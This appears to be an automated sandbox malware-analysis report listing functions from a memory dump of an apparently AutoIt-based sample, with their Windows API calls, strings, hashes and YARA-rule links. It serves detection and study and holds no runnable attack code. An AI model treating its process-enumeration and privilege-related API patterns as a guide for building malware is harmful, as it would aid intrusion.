              • Opcode ID: f1b23cab0fe06a63e3cf33496485f109a6038a3ed679c7916b084585256801a4
              • Instruction ID: ee540ea1ccb47f28e13cf0157107d42e842fe7f55014cf2e23e592e932d717d4
              • Opcode Fuzzy Hash: f1b23cab0fe06a63e3cf33496485f109a6038a3ed679c7916b084585256801a4
              • Instruction Fuzzy Hash: 17A18F75A10202DFDB14EF68CC86B99F3B8FF04304F1145A8E549AB252DB38AD56EF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FDC753, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __wcsnicmp
              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
              • API String ID: 1038674560-2734436370
              • Opcode ID: 3dcde21522cc6a8685639ad23ef62871c232995d974c74164e9e37d97500fb3e
              • Instruction ID: 4427624cfc2c5950d19913210056ffff01ceaae0c98132c366c40d50b60b625f
              • Opcode Fuzzy Hash: 3dcde21522cc6a8685639ad23ef62871c232995d974c74164e9e37d97500fb3e
              • Instruction Fuzzy Hash: F521FB7365061057D720A658AC82F9F73989F66320F048027F8099F346D67AB946E3E1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC3D83, Relevance: 12.1, APIs: 8, Instructions: 107COMMON
              Download Yara Rule
              APIs
              • EnumProcesses.PSAPI(?,00000800,?,?,00FD3C4D,?,?,?,01038178), ref: 00FC3DA0
              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,01038178), ref: 00FC3DFE
              • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00FC3E11
              • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00FC3E28
              • __wsplitpath.LIBCMT ref: 00FC3E52
              • _wcscat.LIBCMT ref: 00FC3E65
              • __wcsicoll.LIBCMT ref: 00FC3E75
              • CloseHandle.KERNEL32(00000000), ref: 00FC3EAD
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
              • String ID:
              • API String ID: 2903788889-0
              • Opcode ID: cc171a301fdddcb8f5d40d1f89b13a81f65db8bee0d18f91989de2d7a1bb0aaa
              • Instruction ID: 60b67513fea1ab748c91731b602bf875466cb6a6654d90968d0e8d02f296cf2a
              • Opcode Fuzzy Hash: cc171a301fdddcb8f5d40d1f89b13a81f65db8bee0d18f91989de2d7a1bb0aaa
              • Instruction Fuzzy Hash: 9F319376900109ABDB11DFA4CD81FEEB7BDAF88310F108199F90987240DA75AF859BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01009705, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Variant$Copy$ClearErrorLast
              • String ID: NULL Pointer assignment$Not an Object type
              • API String ID: 2487901850-572801152
              • Opcode ID: 741c257817014d6eaf56a2521ee24ba42b3768b37479ea2925d32e84171c35ab
              • Instruction ID: 0df62936fcd5a6997750845055a509b7be404efe3ce57c7f29f8d694b4ef48f5
              • Opcode Fuzzy Hash: 741c257817014d6eaf56a2521ee24ba42b3768b37479ea2925d32e84171c35ab
              • Instruction Fuzzy Hash: ABC1B671A00209ABEF15DF98C881FEEB7B9FF48304F148559F94997282D775DA84CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9F540, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89COMMON
              Download Yara Rule
              APIs
              • _strlen.LIBCMT ref: 00F9F548
                • Part of subcall function 00F9F700: _memset.LIBCMT ref: 00F9F708
                • Part of subcall function 00F9F570: _memmove.LIBCMT ref: 00F9F5B9
                • Part of subcall function 00F9F570: _memmove.LIBCMT ref: 00F9F5D3
              • _memset.LIBCMT ref: 00F9F663
              • _memset.LIBCMT ref: 00F9F66D
              • _memset.LIBCMT ref: 00F9F67A
              • _sprintf.LIBCMT ref: 00F9F69E
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memset$_memmove$_sprintf_strlen
              • String ID: %02X
              • API String ID: 1823384282-436463671
              • Opcode ID: f6d23a022f18ccdf09b8ae81581e071d734e21a509da8d72c9d879d08a513551
              • Instruction ID: ebf4b1a6540812292c3f035f63f9abe28cac199f6ff0c17f434b7693e07bd3cf
              • Opcode Fuzzy Hash: f6d23a022f18ccdf09b8ae81581e071d734e21a509da8d72c9d879d08a513551
              • Instruction Fuzzy Hash: 2421DA7270021437EB10A66DCC82B9AB39CAF41700F14407AF645D7181EA68BE09A7A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FD4AE1, Relevance: 9.2, APIs: 6, Instructions: 163COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _wcscpy$_wcscat
              • String ID:
              • API String ID: 2037614760-0
              • Opcode ID: c75dba6e614116b94f097de9b348c993c97bec51e850f236bb972012156e9411
              • Instruction ID: 275bf31d8507d70b92da19afceff60099875775d65fdaee6efe2cf2c036a4ae6
              • Opcode Fuzzy Hash: c75dba6e614116b94f097de9b348c993c97bec51e850f236bb972012156e9411
              • Instruction Fuzzy Hash: 8D41283190011467CB35EF5899D2AFF736AEFA6320F48405BFC5687302D639B992F6A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FE1AB8, Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,00000000), ref: 00FE1B16
              • VariantCopy.OLEAUT32(?,?), ref: 00FE1B6E
              • VariantCopy.OLEAUT32(-00000068,?), ref: 00FE1B84
              • VariantCopy.OLEAUT32(-00000088,?), ref: 00FE1B9D
              • VariantClear.OLEAUT32(-00000058), ref: 00FE1C17
              • SysAllocString.OLEAUT32(00000000), ref: 00FE1C30
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Variant$Copy$AllocClearErrorLastString
              • String ID:
              • API String ID: 960795272-0
              • Opcode ID: 9271ab6a23fe20bf823ab2b962722b8835baa44990a149de8090b0e0c2debdfd
              • Instruction ID: d30399e1d8cf3a330b929bf03fc4373e830a48de5d375cedd62a227de0416b28
              • Opcode Fuzzy Hash: 9271ab6a23fe20bf823ab2b962722b8835baa44990a149de8090b0e0c2debdfd
              • Instruction Fuzzy Hash: 3C51B1B1900209DFDB24DF65D881B9AB7F9FF48310F208169E944AB351DB79ED45CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC3187, Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,01038178), ref: 00FC319E
              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,01038178), ref: 00FC31B9
              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,01038178), ref: 00FC31C3
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,01038178), ref: 00FC31CB
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,01038178), ref: 00FC31D5
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: PerformanceQuery$CounterSleep$Frequency
              • String ID:
              • API String ID: 2833360925-0
              • Opcode ID: 1a0af7f5a5be6b86c8ca1508d9e65d1a533245529f095e98b126dd66a7d2949e
              • Instruction ID: 68fb40adf3ed21b30373c87908005b253dda34006b4ea1a6e3b5316a9b34774f
              • Opcode Fuzzy Hash: 1a0af7f5a5be6b86c8ca1508d9e65d1a533245529f095e98b126dd66a7d2949e
              • Instruction Fuzzy Hash: 8B11D336D0011EABCF10EF99EA05AEDB778FF89722F118555E905B3204DB399A019BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA6FA5, Relevance: 9.0, APIs: 6, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • __getptd.LIBCMT ref: 00FA6FB1
                • Part of subcall function 00FA798C: __getptd_noexit.LIBCMT ref: 00FA798F
                • Part of subcall function 00FA798C: __amsg_exit.LIBCMT ref: 00FA799C
              • __amsg_exit.LIBCMT ref: 00FA6FD1
              • __lock.LIBCMT ref: 00FA6FE1
              • InterlockedDecrement.KERNEL32(?), ref: 00FA6FFE
              • _free.LIBCMT ref: 00FA7011
              • InterlockedIncrement.KERNEL32(035B17D8), ref: 00FA7029
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
              • String ID:
              • API String ID: 3470314060-0
              • Opcode ID: eae1fff33fb37b774131c6e0638ada67ddb8c689b9f432024da5916a1ccc643e
              • Instruction ID: 518f9c93e733ef02d5de2ba92567cb15e30fb3cd831e661016ddbe6261a9e6d2
              • Opcode Fuzzy Hash: eae1fff33fb37b774131c6e0638ada67ddb8c689b9f432024da5916a1ccc643e
              • Instruction Fuzzy Hash: BD01A9B2D01721ABC731BF64A805B6DB7A0BF06B60F184105F880A7285DB2C6D81FFD1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9F010, Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
              Download Yara Rule
              APIs
              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F9F048
              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F9F050
              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F9F05B
              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F9F066
              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F9F06E
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F9F076
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Virtual
              • String ID:
              • API String ID: 4278518827-0
              • Opcode ID: 4cff050359899331a68dfb4f48bd06e02b131024bedc0ff904e5a091724081f8
              • Instruction ID: bf2dc37fef1a5a783858fe6cd8ef6e1efa0a3ba2ed6a87ab5db11a59f27dc25a
              • Opcode Fuzzy Hash: 4cff050359899331a68dfb4f48bd06e02b131024bedc0ff904e5a091724081f8
              • Instruction Fuzzy Hash: 5D016770106B88ADD3309F668C84B43FEF8EF95704F01490DD1D507A82C6B5A84CCB69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FDB5C7, Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
              Download Yara Rule
              APIs
              • InterlockedExchange.KERNEL32(?,?), ref: 00FDB5E1
              • EnterCriticalSection.KERNEL32(?), ref: 00FDB5F2
              • TerminateThread.KERNEL32(?,000001F6), ref: 00FDB600
              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 00FDB60E
                • Part of subcall function 00FC25E5: CloseHandle.KERNEL32(00000000,00000000,?,00FDB61A,00000000,?,000003E8,?,000001F6), ref: 00FC25F3
              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FDB623
              • LeaveCriticalSection.KERNEL32(?), ref: 00FDB62A
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
              • String ID:
              • API String ID: 3495660284-0
              • Opcode ID: f95e7cdce88bc0d43b8e07ef64845fb0439a90654b5410f86942cb359fe2d9ba
              • Instruction ID: 09833a6cdf8cca8c6d4c0e8d5a76b47884aac9eedbbb362d4fe11d5692254c58
              • Opcode Fuzzy Hash: f95e7cdce88bc0d43b8e07ef64845fb0439a90654b5410f86942cb359fe2d9ba
              • Instruction Fuzzy Hash: 45F08C72541201BBC220AF60ED88DEFB77DFB48321B640526F64182640CB7EE411CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FEF9B8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00FEFA20
              • GetMenuItemInfoW.USER32 ref: 00FEFA3B
              • DeleteMenu.USER32(?,?,00000000), ref: 00FEFA8C
              • DeleteMenu.USER32(00000000,?,00000000), ref: 00FEFADF
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Menu$Delete$InfoItem_memset
              • String ID: 0
              • API String ID: 1173514356-4108050209
              • Opcode ID: c624442502f00283088e9102ae8b6d93682ae5149058e1044e21ccd81b4f5cc0
              • Instruction ID: f7c91fc8ec8f3470066ef4665c75a7ae36705cec139ba5297e4b78817ee405be
              • Opcode Fuzzy Hash: c624442502f00283088e9102ae8b6d93682ae5149058e1044e21ccd81b4f5cc0
              • Instruction Fuzzy Hash: 9641D271600241AFD310DF25DC80B1AB7A8EF85724F14867EF9A89B281D379E8449BA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FAF619, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
              Download Yara Rule
              APIs
              • _malloc.LIBCMT ref: 00FAF627
                • Part of subcall function 00FA34DB: __FF_MSGBANNER.LIBCMT ref: 00FA34F4
                • Part of subcall function 00FA34DB: __NMSG_WRITE.LIBCMT ref: 00FA34FB
                • Part of subcall function 00FA34DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00FA6A35,?,00000001,?,?,00FA8179,00000018,0101D180,0000000C,00FA8209), ref: 00FA3520
              • _free.LIBCMT ref: 00FAF63A
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: db592e21dd44badf644c01f0bd817cba3c4e76707e79d0f8370c3cd1cf362d4d
              • Instruction ID: 491dc4967045ca9895c2be15b913671966848ab48c4ad264ea60fbba7ce481d3
              • Opcode Fuzzy Hash: db592e21dd44badf644c01f0bd817cba3c4e76707e79d0f8370c3cd1cf362d4d
              • Instruction Fuzzy Hash: 7C11C4B3904314ABCB313EB4AC44A5A3758DF573B1F214435F8889E260DB3D8840B7A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA7726, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
              Download Yara Rule
              APIs
              • __getptd.LIBCMT ref: 00FA7732
                • Part of subcall function 00FA798C: __getptd_noexit.LIBCMT ref: 00FA798F
                • Part of subcall function 00FA798C: __amsg_exit.LIBCMT ref: 00FA799C
              • __getptd.LIBCMT ref: 00FA7749
              • __amsg_exit.LIBCMT ref: 00FA7757
              • __lock.LIBCMT ref: 00FA7767
              • __updatetlocinfoEx_nolock.LIBCMT ref: 00FA777B
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
              • String ID:
              • API String ID: 938513278-0
              • Opcode ID: d6ba177cd5c53b9f01a16422fe243f18682fa22002dab58d6b6bfe71e3858d96
              • Instruction ID: 98569909f04203f5dd95334083958b4084f9accf5f595e1a6f35a18dcd1b771d
              • Opcode Fuzzy Hash: d6ba177cd5c53b9f01a16422fe243f18682fa22002dab58d6b6bfe71e3858d96
              • Instruction Fuzzy Hash: 1EF090B3D087109BDB20BB745C03F5E73A0AF02760F240159F151AB2C6DB6C5940BB59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA08E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,00F9E820), ref: 00FA08EB
              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA08FD
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetNativeSystemInfo$kernel32.dll
              • API String ID: 2574300362-192647395
              • Opcode ID: b9e0c9eed09aa2abf8d56f19628f7fdf7a786589f2d2eb6df44939e2a9d51949
              • Instruction ID: 4b3468b1b0ebe86a0b99ea9d5a69394eea525ee9028cee75d2d08b1200db4811
              • Opcode Fuzzy Hash: b9e0c9eed09aa2abf8d56f19628f7fdf7a786589f2d2eb6df44939e2a9d51949
              • Instruction Fuzzy Hash: 5DD0C9F0D007069AE7300F22E84860376E4AB46791F20842CA4C299209DBBCC0909B64
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA0870, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,00F9E7C8), ref: 00FA087B
              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00FA088D
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: IsWow64Process$kernel32.dll
              • API String ID: 2574300362-3024904723
              • Opcode ID: 2330d8dbd93caf944167a73f66f0968ec6cc4cd195c28ea8679e6f6cbff0e9b3
              • Instruction ID: 9c071f127c12857e06ae1b13af41ff43b2fcd8497e7d57c157356fcb6de3702d
              • Opcode Fuzzy Hash: 2330d8dbd93caf944167a73f66f0968ec6cc4cd195c28ea8679e6f6cbff0e9b3
              • Instruction Fuzzy Hash: 94D0C9F4D007029AD7301F22E80860276E4AB427A3F20846CB4D59A148DBBCC0909B64
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FE1CA1, Relevance: 6.4, APIs: 4, Instructions: 405COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 68d4094a4b129dbafbd11a74c63bc43deb0018f4c435cc078da90800a14343b5
              • Instruction ID: 7865ead81a8999f14c9564072f9157982940160e9e1d65e3089fa2817778a81e
              • Opcode Fuzzy Hash: 68d4094a4b129dbafbd11a74c63bc43deb0018f4c435cc078da90800a14343b5
              • Instruction Fuzzy Hash: 9DE15D75A00249AFCB14DF99D880EAAB7B9FF88314F108599F909CB251D735EE41DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 010094BA, Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(?), ref: 010094C9
              • SysAllocString.OLEAUT32(00000000), ref: 01009592
              • VariantCopy.OLEAUT32(?,?), ref: 010095C9
              • VariantClear.OLEAUT32(?), ref: 0100960A
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
